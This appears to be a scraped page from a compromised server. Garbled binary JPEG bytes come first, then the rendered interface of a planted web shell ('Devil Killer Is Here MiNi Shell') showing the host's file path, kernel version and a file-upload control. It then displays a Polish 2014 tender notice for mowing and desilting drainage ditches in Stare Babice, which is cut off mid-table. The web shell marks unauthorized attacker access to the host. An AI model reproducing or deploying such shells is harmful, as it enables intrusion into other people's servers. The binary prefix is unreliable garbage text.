JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140522/173732-N-2014.html

<p class="kh_header"><b>Stare Babice: Koszenie skarp i odmulanie dna rowów melioracyjnych 
na terenie gminy Stare Babice</b><br>
<b>Numer ogłoszenia: 173732 - 2014; data zamieszczenia: 22.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminna Spółka Wodna "Babice" , ul. Rynek 32, 05-082 Stare Babice, woj. mazowieckie, tel. 022 752 82 71, faks 022 722 90 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://woda.stare-babice.eu/index.php?op=1</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koszenie skarp i odmulanie dna rowów melioracyjnych 
na terenie gminy Stare Babice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest koszenie skarp i odmulanie dna rowów melioracyjnych na terenie gminy Stare Babice.
Zamówienie będzie udzielone w dwóch częściach:
	Część 1 - Ręczne koszenie skarp rowów melioracyjnych na terenie gminy Stare Babice.
	Część 2 - Odmulanie dna rowów melioracyjnych na terenie gminy Stare Babice.

1.	Opis przedmiotu zamówienia dla Część 1 - Ręczna koszenie skarp rowów melioracyjnych na terenie gminy Stare Babice.
Przedmiot zamówienia w Części 1 obejmuje jednorazowe ręczne wykoszenie skarp rowów melioracyjnych o łącznej długości około 62  642 mb i powierzchni skarp około 359 646 m2,
1)	Szczegółowy zakres prac:
1)	wykoszenie dna, skarp i korony rowu (szerokość koszenia korony ok. 1 mb) z wygrabieniem trawy na koronę rowu melioracyjnego poza teren skoszony,
2)	zebranie śmieci z wykoszonych rowów (z dna, skarp i korony) i ich wywóz we własnych workach i we własnym zakresie,
3)	Wykonawca w pierwszej kolejności musi wykosić rowy, które w Części 2 przeznaczone są do odmulenia (Z - 5, Z - 5/27, Z - 5/28, Z - 7/8); 
w przypadku, kiedy Wykonawca nie wykona powyższego Zamawiający wówczas naliczy kary określone we wzorze umowy jak za wykonanie przedmiotu zamówienia niezgodnie z SIWZ;
2)	Parametry rowów melioracyjnych:

Rów
melioracyjny	Długość
(mb)	Pow. skarp
(m2)	Szerokość
dna (m)	Wyloty
drenarskie (szt.)	Przepusty
(szt.)
Z - 5
rów pierwszej kolejności koszenia	6 856	46 929	0,5	38	117
Z - 5/1	1 175	5 412	0,5	4	31
Z - 5/3	360	1 438	0.5	-	10
Z - 5/27
rów pierwszej kolejności koszenia	880	4 296		7	11
Z - 5/28
rów pierwszej kolejności koszenia	106	596		-	1
Z - 7	5 810	32 873	0,5	9	27
Z - 7/1	1 050	6 063	0,5	4	9
Z - 7/1/1	695	3 522	0,5	4	5
Z - 7/1/2	350	1 730	0,5	1	3
Z - 7/1/3	420	1 914	0.5	-	2
Z - 7/2	44	171	0.5	1	-
Z - 7/3	70	277	0.5	1	-
Z - 7/4	40	245		1	-
Z - 7/5	130	673	0.5	1	-
Z - 7/6	1 320	7 234	0.5	10	11
Z - 7/8
rów pierwszej kolejności koszenia	3 270	15 024	0.5	13	16
Z - 8	2 660	15 973	0.5	21	17
Z - 8/1	540	3 060	0.5	2	8
Z - 8/2	440	3 106	0.5	-	2
Z - 8/3	220	1 606	0.5	-	4
Z - 8/4	872	4 900	0.5	6	3
Z - 8/5	475	2 527	0.5	-	-
Z - 9	1 380	7 668	0.5	-	7
Z - 9/1	1 230	4 772	0.5	-	4
Z - 9/2	300	1 230	0.5	-	-
Z - 9/3	490	1 901	0.5	-	1
Z - 9/4	180	698	0.5	-	-
Z -10	560	2 357	0.5	-	1
Z - 11	1 160	4 454	0.5	-	10
Z - 12	370	1 569	0.5	-	-
Z - 13	600	2 760	0.5	-	7
Z - 13/1	210	890	0.5	-	2
Z - 14	1 320	5 122	0.5	-	6
Z - 14/2	300	1 164	0.5	-	-
Z - 14/3	250	970	0.5	-	-
Z - 15	1 580	10 030	0.5	-	-
Z - 16	800	2 777	0.5	-	5
Z - 16/1	260	915	0.5	-	2
O - 11/1	3 650	26 914	0.5	32	3
O - 11/1/2	920	4 989	0.5	8	11
O - 11/1/3	960	5 869	0.5	4	10
O - 11/1/4	157	900	0.5	3	3
O - 11/1/5	1 400	8 813	0.5	10	4
O - 11/1/6	1 900	13 206	0.5	21	35
O - 11/1/7	1 224	7 699	0.5	14	18
O - 11/1/8	34	122	0.5	2	-
O - 11/1/9	160	1 082	0.5	-	-
O - 11/1/10	1 100	8 694	0.5	11	21
O - 11/1/11	480	3 123	0.5	8	2
O - 11/1/12	270	1925	0.5	3	1
O - 11/1/13	540	4 487	0.5	4	2
O - 11/1/14	90	477	0.5	-	-
O - 11/2	1 325	7 967	0.5	4	8
O - 16/3	3 348	24 379	0.5	14	5
O - 16/3/6	535	3 585	0.5	9	1
O - 16/3/7	436	3 139	0.5	5	9
O - 16/3/8	3 175	22 640	0.5	8	7


2.	Opis przedmiotu zamówienia dla Część 2 - Odmulanie dna rowów melioracyjnych na terenie gminy Stare Babice.
Przedmiotem zamówienia jest mechaniczne lub ręczne odmulenie dna rowów melioracyjnych na terenie gminy Stare Babice.
1)	Szczegółowy zakres prac:
a)	odmulenie dna rowów melioracyjnych o dł. ok. 13 027 mb na całej szerokości dna warstwą min. 40 cm z jego rozplantowaniem na koronie rowu melioracyjnego,
b)	odmulenie 3 rurociągów O 80 cm o długości 104 mb, 104 mb, 100 mb (ok. 1/2 zamulenia) wraz z wywiezieniem namułu,
c)	oczyszczenie z namułu 58 szt. wylotów drenarskich,
d)	oczyszczenie  z namułu  145 szt. przepustów (ok. 1/2 zamulenia).
e)	zebranie śmieci z odmulonych rowów (z dna, skarp i korony) i ich wywóz we własnych workach i we własnym zakresie,
f)	Wykonawca realizował będzie prace związane z odmulaniem dna rowów melioracyjnych dopiero po wykonaniu koszenia skarp rowów przeznaczonych do odmulenia; 
Wykonawca Części 1 zamówienia ma obowiązek wykoszenia rowów przeznaczonych do odmulenia w pierwszej kolejności,





2)	Parametry rowów melioracyjnych
Rów
melioracyjny	Długość
(mb)	Pow. skarp
(m2)	Szerokość
dna (m)	Wyloty
drenarskie
(szt.)	Przepusty
(szt.)
Z -  5	8 463 + 308 (rurociągi)	46 001	0,5	38	126
Z - 5/27	880	4 296	0,5	7	11
Z - 5/28	106	596	0,5	-	1
Z - 7/8	3270	15 024	0,5	13	16

3.	Warunki prowadzenia prac dla Części 1 i Części 2
1)	W przypadku stwierdzenia przez Zamawiającego niewłaściwego wykonania prac, Wykonawca wykona je ponowne z wymaganiami SIWZ we własnym zakresie i na własny koszt, w czasie 2 dni od momentu powiadomienia przez Zamawiającego;
2)	Usługę należy prowadzić w taki sposób, aby nie kolidowała ona z normalnym funkcjonowaniem rowów melioracyjnych;
3)	Wszelkie roszczenia użytkowników gruntów przyległych do rowów, dróg i mieszkańców, jakie wpłyną do Zamawiającego, związane z wadliwym wykonaniem i technologią prac będących przedmiotem niniejszej SIWZ, będą kierowane do Wykonawcy, w celu ich załatwienia. Wykonawca zobowiązany jest w terminie 7 dni od otrzymania takiego pisma podjąć działania, mające na celu załatwienie sprawy ze zgłaszającym uszkodzenie. W przypadku, gdy Wykonawca nie podejmie działań, w celu załatwienia w/w sprawy wówczas Zamawiający pokryje koszty zgłoszonego roszczenia i potrąci Wykonawcy z wynagrodzenia za wykonane prac;
4)	W przypadku zniszczenia urządzeń infrastruktury technicznej w trakcie prowadzenia prac będących przedmiotem zamówienia Wykonawca jest zobowiązany natychmiast powiadomić w sposób skuteczny właściciela urządzenia o jego uszkodzeniu oraz ponieść wszelkie koszty związane z jego naprawą;              
5)	W przypadku nie podjęcia obowiązków ciążących na Wykonawcy, Zamawiający zastrzega sobie prawo zlecenia wykonania prac objętych niniejszą umową w trybie awaryjnym innej firmie na koszt i ryzyko Wykonawcy;
6)	Wykonawca zgadza się na potrącenie kosztów zlecenia zastępczego wykonania prac z kolejnej faktury;
7)	Zamawiający przewiduje bieżącą kontrolę wykonywanych usług. Kontroli Zamawiającego będzie poddany w szczególności sposób wykonania prac w aspekcie zgodności ich wykonania z SIWZ; 
8)	Wady ujawnione w czasie odbioru będą usunięte w terminie wyznaczonym przez Zamawiającego;
9)	Zamawiający przewiduje odbiory częściowe 1 raz/m-c wykonanych prac. Do odbioru częściowego Wykonawca zobowiązany jest przedstawić dokumenty z obmiarem i miejsce wykonanych ;
10)	Zakończenie wykonywania przedmiotu zamówienia zostanie potwierdzone protokołem odbioru podpisanym przez strony;
11)	Do wykonania zamówienia Wykonawca powinien użyć odpowiedniego sprzętu, zapewniającego dobrą, jakość wykonanych robót oraz bezpieczeństwo ich wykonywania. Sposób postępowania z odpadami powstałymi w wyniku prowadzonych prac musi być zgodny z obowiązującymi przepisami prawa;
12)	Prace można rozpocząć dopiero po wykonaniu oznakowania i zabezpieczenia prac zgodnie z przepisami prawa. Wykonawca ponosi pełną odpowiedzialność za utrzymanie oznakowania i zabezpieczenia prac w trakcie ich wykonywania;
13)	Od momentu protokolarnego przejęcia terenu wykonywania usługi aż do chwili ich zakończenia Wykonawca będzie ponosił odpowiedzialność na zasadach ogólnych za szkody wynikłe na tym terenie;
14)	W czasie realizacji usługi Wykonawca będzie utrzymywał teren wykonywania prac w stanie wolnym od przeszkód komunikacyjnych;
15)	Wykonawca ponosi pełną odpowiedzialność za wykonanie i utrzymanie oznakowania i zabezpieczenia terenu wykonywania usługi;
16)	Wykonawca będzie zobowiązany umową do przyjęcia odpowiedzialności od następstw i za wyniki działalności w zakresie:
	Organizacji i wykonywania usługi 
	Zabezpieczenia interesów osób trzecich
	Ochrony środowiska
	Warunków bezpieczeństwa i higieny pracy
	Organizacji i utrzymywania zaplecza wykonywania prac
	Bezpieczeństwa ruchu drogowego i pieszego
	Ochrony mienia związanego z prowadzeniem prac 
4.	Warunki dotyczące ilości prac 
1)	Ceny jednostkowe podane przez Wykonawcę w ofercie nie ulegają zmianie w okresie trwania umowy.
2)	Podane powyżej ilości prac do wykonania dla Części 1 i 2 są wartościami szacunkowymi dającymi podstawę do wyliczenia porównawczej ceny ofertowej brutto i będą ulegały zmianie w zależności od potrzeb Zamawiającego.
Zamawiający przyjął roczną ilość prac każdego rodzaju w oparciu o analizę swoich potrzeb. 
Określone ilości prac w ramach przedmiotu zamówienia są szacunkowe i mogą ulec zmianie w zależności od potrzeb Zamawiającego, na co Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian ilościowych w trakcie realizacji przedmiotu zamówienia. 
Faktyczne ilości wykonanych prac mogą odbiegać od podanych ilości. Zamawiający nie jest zobowiązany do zrealizowania w całości podanych ilości prac jak też może zwiększyć ilości poszczególnych prac w zależności od potrzeb..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające dla każdej Części w wysokości do 50% zamówienia podstawowego dla danej części.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.72.00.00-0, 50.80.00.00-3, 90.72.00.00-0, 50.80.00.00-3, 90.51.36.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający rezygnuje z wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają niżej wymienione warunki udziału w postępowaniu posiadają wiedzę i doświadczenie, tj. o niniejsze zamówienie może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej:
dla Części 1 - dwa zadania polegające na koszeniu rowów o długości minimum 10 km każde.
dla Części 2 - dwa zadania polegające na odmulaniu dna rowów o długości minimum 4 km wraz z przepustami i wylotami każde.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1)	Ofertę Wykonawcy sporządzoną na podstawie wzoru do niniejszej SIWZ wraz z Załącznikiem Nr 1 Formularz cenowy,
2)	Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, dotyczy również spółek cywilnych, o ile stosowne zapisy nie wynikają z treści umowy spółki,
4)	Pozostałe dokumenty wymienione w pkt. 9, 10, 11 SIWZ.
Zamawiający prosi o dołączenie Formularza nr 1 - Dane Ogólne, spisu treści i ponumerowanie wszystkich zapisanych stron oferty. Strony zawierające informacje niewymagane przez Zamawiającego (np.: prospekty reklamowe o firmie, jej działalności, itp.) nie muszą być numerowane i parafowane.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia zmian do treści zawartej umowy dotyczące zmiany przedmiotu umowy lub zmiany terminu wykonania przedmiotu umowy w następujących przypadkach:
1)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
2)	z powodu wystąpienia robót dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego Wykonawcę,
3)	z powodu okoliczności siły wyższej, niezależnej od Zamawiającego i Wykonawcy, a której nie można było przewidzieć i która nie pozwala na kontynuację robót będących przedmiotem umowy, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
4)	z powodu działań osób trzecich uniemożliwiających wykonanie przedmiotu umowy, które to działania nie są konsekwencją winy którejkolwiek ze stron,
5)	z powodu wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności. 
2.	Zamawiający przewiduje możliwość wprowadzenia zmian do treści zawartej umowy dotyczące zmiany ceny za przedmiot umowy w przypadku wejścia w życie zmiany przepisów w zakresie wysokości podatku od towarów i usług (VAT) mających zastosowanie w czasie realizacji niniejszej umowy, wynagrodzenie brutto Wykonawcy za część robót wykonywaną po tym terminie ulegnie stosownym zmianom natomiast wartość wynagrodzenia netto pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.babice-stare.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starych Babicach (05-082) ul. Rynek 21 pok. 42 lub U.G. ul. Rynek 32 pok. 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2014 godzina 12:00, miejsce: Urząd Gminy w Starych Babicach (05-082) ul. Rynek 32 Sekretariat pok. 18. Otwarcie godz. 12:05.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ręczna koszenie skarp rowów melioracyjnych na terenie gminy Stare Babice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w Części 1 obejmuje jednorazowe ręczne wykoszenie skarp rowów melioracyjnych o łącznej długości około 62  642 mb i powierzchni skarp około 359 646 m2,
1)	Szczegółowy zakres prac:
1)	wykoszenie dna, skarp i korony rowu (szerokość koszenia korony ok. 1 mb) z wygrabieniem trawy na koronę rowu melioracyjnego poza teren skoszony,
2)	zebranie śmieci z wykoszonych rowów (z dna, skarp i korony) i ich wywóz we własnych workach i we własnym zakresie,
3)	Wykonawca w pierwszej kolejności musi wykosić rowy, które w Części 2 przeznaczone są do odmulenia (Z - 5, Z - 5/27, Z - 5/28, Z - 7/8); 
w przypadku, kiedy Wykonawca nie wykona powyższego Zamawiający wówczas naliczy kary określone we wzorze umowy jak za wykonanie przedmiotu zamówienia niezgodnie z SIWZ;
2)	Parametry rowów melioracyjnych:

Rów
melioracyjny	Długość
(mb)	Pow. skarp
(m2)	Szerokość
dna (m)	Wyloty
drenarskie (szt.)	Przepusty
(szt.)
Z - 5
rów pierwszej kolejności koszenia	6 856	46 929	0,5	38	117
Z - 5/1	1 175	5 412	0,5	4	31
Z - 5/3	360	1 438	0.5	-	10
Z - 5/27
rów pierwszej kolejności koszenia	880	4 296		7	11
Z - 5/28
